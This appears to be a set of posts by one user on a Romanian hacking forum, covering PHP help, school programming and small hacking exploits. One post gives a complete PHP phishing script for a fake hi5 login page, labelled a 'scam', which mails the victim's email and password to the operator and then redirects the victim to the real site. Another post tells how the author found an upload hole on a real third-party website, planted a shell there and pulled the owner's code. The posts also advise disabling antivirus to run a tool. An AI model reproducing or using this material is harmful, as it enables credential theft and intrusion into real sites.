tw8

Yeah ... cand o sa fiu mare, vreau sa fiu ca tipul asta . Are si o engleza de invidiat .

La idei nu ma bag, dar daca ai nevoie de ajutor la partea de "hacing" poti conta pe mine .

Guess you're a PHP geek . O simpla cautare pe Google te ducea catre asta. Aici e explicat cum sa trimiti un mail. Daca nu esti total habarnist, o sa iti dai seama cum sa combini cele 2 scripturi ca sa obtii unul functional si care sa trimita mail.

Nu l-a rulat. Inteligent, nu ?

Uitati exemplu de idee proasta, care te poate costa in caz ca asta s-ar intampla in "real life" si e la mijloc un site calumea. Un om vrea sa faca un fileuploader ... pana aici, nimic rau. Nu ii iese ceva, si cere ajutor pe un forum. Primeste ajutor, dar e avertizat ca nu e chiar cea mai buna metoda pentru upload. El spune ca va fi "personal", asa ca nu conteaza cat e de bun. Ok ... dar ce se intampla daca pente cateva zile il vezi pe respectivul la semnatura cu ceva de genul: Intri, si, ca tot omul, te gandesti "Ma, sa nu-mi spui ca asta a folosit scriptul ala :-j". Ba da. Asta e o idee proasta. De ce ? Va las pe voi sa va dati seama. [url]http://crazynet.110mb.com/files/lol.php[/url] Ce a vrut sa fie toata tampenia asta ? Doar un exemplu de greseala ca ar putea fi fatala.

@Hertz: Se programeaza de la orice varsta. Ia-o mai usor. De cand dracu dai tu banuri, ca am vazut vreo 3 posturi de-ale tale in care il banai pe tipu' asta . Serios vorbind ... nu ai dreptul/puterea de a bana, dar cred si sper ca adminii sa se autosesizeze, dar nu pentru ca a facut 50 de posturi in 2 zile, ci pentru ca sunt posturi sub orice critica. Ontopic: Bine ai venit ... sper sa pleci tot cu bine .

E usor de zis cand nu ti se intampla tie. Daca te duce capul (si mori in casa de foame ), poti elabora metode foarte destepte care sa dea senzatia de banalitate si sa nu le fie data nicio atentie ... cel putin pana cand se trezeste cutarescu' fara portofel/telefon.

Nu. Un scriptkiddie in plus nu ajuta cu nimic. In plus, Vhaerun a si specificat (in caz ca nu iti dai singur seama) limbajul in care e facut. Daca nu stii sa rulezi un astfel de script, probabil nici nu meriti sa il folosesti (asta nu inseamna ca daca stii sa il rulezi, il meriti/intelegi).

In caz ca ai habar cat de cat de PHP, uite lamurirea. In cod apare asa: Dupa cum poti vedea tot din cod (nu mai dau citat) $buni va contine la sfarsit decodarea ID-ului din cookie. Astfel, acel $buni are ca scop doar sa te ajute sa cauti pe siteurile mai folosite (google, myspace etc) conturi ale aceleiasi persoane. Bafta, si data viitoare nu te mai grabi sa tragi concluzii .

Ca sa trimta mail, tot ce trebuie sa faci e sa inlocuiesti continutul fisierului xxx.php cu asta: <?php // HI5 Identic Scam by Nytro $mail=$_POST['email']; $password=$_POST['password']; $continut="Mail : " . $mail . " Password : " . $password . " "; $eu = "blabla@caca.com"; $titlu = "Alt iubitor de hi5"; mail($eu, $titlu, $continut); header("Location: http://hi5.com/friend/login.do;jsessionid=ampeImWJ5rY-"); ?> Ca sa mearga, trebuie ca hostul sa aiba functia mail() activata.

Nu, ala din 1991 . Noi folosim la scoala Borland 5.1, dar la olimpiada ai voie sa folosesti doar Borland 3.1, din pacate.

Patetic. Sa inteleg ca daca ai avea sursa de la CqKiller nici macar nu ai stii ce sa faci cu ea ? Compilator iti recomand DEV-C++ sau Borland C++.

2. Iti trebuie acest OCX. 3. Opreste Anti-Virusul .

Presupun ca iti dai seama ca e minciuna, nu ? Nu conteaza daca ai cartela sau abonament, pentru ca partea de transmisie o face telefonul, nu cartela .

Invata engleza in mod disctractiv :

Ce chestie ... chiar l-ai facut tu ? Nu de alta, dar seamana al dracu de mult cu asta de aici. Una e sa minti, alta e sa insisti in minciuna. Corect. Gresit. In orice limbaj de programare in care exista lucrul cu fisiere poti face asta .

Probabil ca da . Era doar un LFD ...

Eram la scoala, aveam info . Metoda ta ... probabil un LFI ? Am gasit si eu unul, dar mi-a fost lene sa caut dupa loguri .

Nu se poate asa ceva.

Da, ai dreptate. Am observat XSS-ul din scriptul tau, dar stiam ca trebuie sa fie si ceva mai "mare", care te-a ajutat si pe tine .

Ok. Am luat linkul asta: [url]http://www.scoliosismentors.org/api/index.php?q=aHR0cDovL3d3dy5nb29nbGUuY29tLw==[/url] Am observat ca "q" ia valoarea unui text codat in Base64. L-am decodat. Am observat ca obtin link catre Google. Am codat alt link in Base64 si am pus parametrul q cu acea valoare. Merge. Am incercat sa gasesc un LFI/RFI in script. Am gasit cate ceva, dar nu prea mi-a folosit. Am aflat doar ca foloseste si PHProxy. Mai apoi, am gasit o posibilitate sa uploadez shell. L-am uploadat si am downloadat scriptul lui BanKai. Am aflat ca foloseste doar PHProxy. Deci va puteti face fiecare propriul astfel de script . Bafta .

Bravo . lol . Ia baga un dork si vezi ce sa intampla .

Old & nice . Ceva si mai tare: http://youtube.com/watch?v=5vxWUe3BWCU

Ce chestie, bine ca ne-ai informat.

Ce pot sa zic, m-ai umplut de respect. Azi esti plin de poante ca wc-ul de hartii. Apropo ... si ce-o sa imi faci daca esti din Severin ?